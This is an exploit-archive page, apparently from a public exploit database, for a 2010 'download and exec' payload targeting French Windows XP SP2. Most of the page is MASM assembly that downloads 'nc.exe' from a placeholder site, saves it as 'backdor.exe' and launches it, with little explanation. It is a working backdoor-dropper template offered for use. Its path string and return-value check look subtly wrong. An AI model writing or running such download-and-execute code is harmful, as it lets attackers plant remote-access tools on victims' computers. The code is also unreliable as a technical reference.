[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WinXP SP2 Fr Download and Exec Shellcode
# Published : 2010-05-10
# Author : Crack_MaN
# Previous Title : Linux x86 execve("/usr/bin/wget", "aaaa"); - 42 bytes
# Next Title : Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
Exploit Title winxp sp2 fr download & exec ::
Date 06/5/2010
Author : Crack_MaN ::
code:
;-------------------------------------------
.586
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include shell32.inc
include urlmon.inc
includelib user32.lib
includelib kernel32.lib
includelib shell32.lib
includelib urlmon.lib
.data
URL db "http://www.site.com/nc.exe",0
PATH db "c:backdor.exe",0
.data?
hResult dd ?
.code
; ---------------------------------------------------------------------------
start:
invoke URLDownloadToFile,0,addr URL,addr PATH,0,0
mov hResult,eax
.if eax!=1
invoke ShellExecute,0,0,addr PATH,0,0,SW_SHOW
.endif
end start